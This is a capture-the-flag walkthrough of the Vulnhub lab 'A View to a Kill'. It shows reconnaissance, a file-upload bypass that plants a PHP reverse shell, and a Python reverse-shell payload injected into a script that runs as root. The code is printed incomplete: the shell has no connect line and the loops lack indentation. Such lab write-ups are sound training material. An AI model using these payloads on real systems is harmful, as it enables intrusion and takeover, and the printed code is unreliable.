Today we’ll be sharing another CTF challenge walkthrough. This lab is highly inspired by the James Bond movie- “A View to a Kill.” The lab is made by creosote and hosted on Vulnhub.
According to the Author:
Mission: Millionaire psychopath Max Zorin is a mastermind behind a scheme to destroy Silicon Valley in order to gain control over the international microchip market. Get root and stop this madman from achieving his goal!
· Difficulty: Intermediate
· Flag is /root/flag/flag.sh
· Use in VMware. DHCP enabled.
· Learning Objectives: Web Application Security, Scripting, Linux enumeration and more.
Penetration Testing Methodologies
Network Scanning
· netdiscover
· nmap scan
· finding ports
Enumeration
· Enumerating directories
· Finding backup archive
· Enumerating username and finding password
· Finding /sentrifugo
Exploitation
· Exploiting file upload vulnerability in sentrifugo
· Gaining shell
· Enumerating users and their home directories
· Logging in Jenny
Post Exploitation
· Finding aView.py script with Jenny’s group permissions
· Reading note.txt using this script
· Discovering algorithm for secret directories and finding directories by creating a custom script
· Finding remote
· Gaining root shell
Lets begin then
On netdiscover scan, we found the IP address of the machine to be 192.168.238.161
On running an nmap scan, we found 4 ports to be open. There was a webpage as well and nmap had also enumerated 4 disallowed entries in robots.txt
We opened these 4 directories one by one and saw HR acquisition portal on
On /dev there was an index listing of multiple files. There were PDFs on some kind of RFID device, text file, images and most importantly we saw a backup archive. We downloaded it.
Inside that archive were 4 text files among which, one important text file caught our eye which had info about a new employee chuck.
Now, in /dev directory the PDFs were starting to make sense! The password=secret word in a video+transmid freq of HID reader
In one of the PDFs we saw a manual on HID proxcard reader and found the frequency to be 125Hz
I didn’t see any video in /dev but there was a gif file which had a detonator in it. It said the word helicopter
We tried to log it in the HR portal on /zorin
It said that /sentrifugo was where temporarily HR portal had moved. We moved there to find a login screen
It successfully logged us in with the found credentials! Now it was certain that exploitation had to begin from here. We tried to find any kind of vulnerability in sentrifugo platform and luckily we found one on exploit-db
We went on to the portal>expenses>add>receipts and added our php-reverse-shell with double extension methodology
It’s the webshell available in /usr/share/webshells. Just change the code to your own IP and make it double extension to .php.doc
Now we intercepted the upload using burpsuite and passed it on as php and it successfully accepted it!
We changed the extension from .php.doc to simply php and changed our IP from burpsuite only.
Once our shell was uploaded we started a reverse netcat listener on port 1234 and accepted the connection! We got our connection simply by viewing the shell that got uploaded.
First things first, we imported a pseudo teletype using python one liner.
python -c ‘import pty;pty.spawn(“/bin/bash”)’
Next, we traversed to the home directory and found there were 4 user directories there. In /home/jenny there was an archive named dsktp_backup.zip which seemed interesting so we unzipped it and found two text files. One had jenny’s password in it and other had some instructions among which there was a mention of a script called aView.py
We logged into jenny with password !!!sfbay!!! and traversed to /home/max to find that python script. Viewed the source code and found that it was simply printing out some text.
But the interesting thing to note was that it was running commands as max. And there was a note.txt in the same directory which jenny couldn’t read. So we added some code into the preexisting python script that would simply stdout the note.txt file in hope that it will be useful for privilege escalation. I wrote a script av.py that had the same content as existing script plus a command to print out note.txt
#!/usr/bin/python
import os
#
# executed from php app add final wrapper/script here
print “waiting on engineers to tweak final code”
os.system(‘cat note.txt’)
On the victim’s /tmp directory I downloaded this script using wget command. Then I traversed back in /home/max to simply stdout av.py and redirect it’s output in aView.py so that when jenny runs it, it also displays note.txt
Now, in note, scarpine wrote that a secret directory exists which is hashed using the algorithm:
sha1(lower_alpha+”view”+digit+digit)
This directory existed on port 8191 and had to be found out. I used a tool called mp64 to create this list using given algorithm in clear text and then coded a python script to covert this list into it’s respective SHA1 hashes.
mp64 ?lview?d?d > fuzz.txt
python fuzzing.py > new_fuzz.txt
We can then use a simple python/c script to convert the strings into sha1 hashes or use one of the online tools such as http://www.sha1-online.com/
This could also be done by this following code which isn’t that complicated.
new.py
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import string
from hashlib import sha1
import requests
fuzz=[]
for alpha in string.ascii_lowercase:
for a in string.digits:
for b in string.digits:
payload= sha1((alpha + "view" + a + b + "\n").encode("utf-8")).hexdigest()
fuzz.append(payload)
file1 = open("directories.txt","w")
for i in fuzz:
file1.write(i)
file1.write("\n")
file1.close()
By using the second method, we saved the hashes in directories.txt file and ran dirb scan using this list
Wow. A bunch of files were found. We tried to open first directory and looks like the author got us here!
But wait, there was a directory which had unusual length as compared to other directories. Maybe this had something
Looks like we found the remote! We executed this using the button and a script called run.php seemed to run.
Hey! This text seems familiar. You remember aView.py file? It seems like this run.php file was taking the stdout from aView.php file and displaying it. Now when I remember, the comment in aView.py also said “executed from php app…”
So we decided to replace some of the code in aView.py by pentestmonkey’s python one liner reverse shell!
We SSHed in jenny first and used nano to display contents of aView.py
We replaced aView.py with this code:
#!/usr/bin/python
import os
import socket
import subprocess
#
# executed from php app add final wrapper/script here
# executed from php app add final wrapper/script here
print “waiting on engineers to tweak final code”
os.system(‘cat note.txt’)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call([“/bin/sh”,”-I”])
We set up a reverse listener on port 1234 and waited for shell and voila! Seems like run.php had root permissions since we got a root shell! We traversed to /root to read the flag
Lets open :8007 on our browser and read congratulatory flag!
So, this was how we solved this lab. In my opinion, if you know some things like a bit of python scripting and knowledge of basic linux permissions and tools, lab won’t feel lhard. It was certainly lengthy though due to the requirement of scripting but I thoroughly enjoyed the lab. Thanks to creosote for this!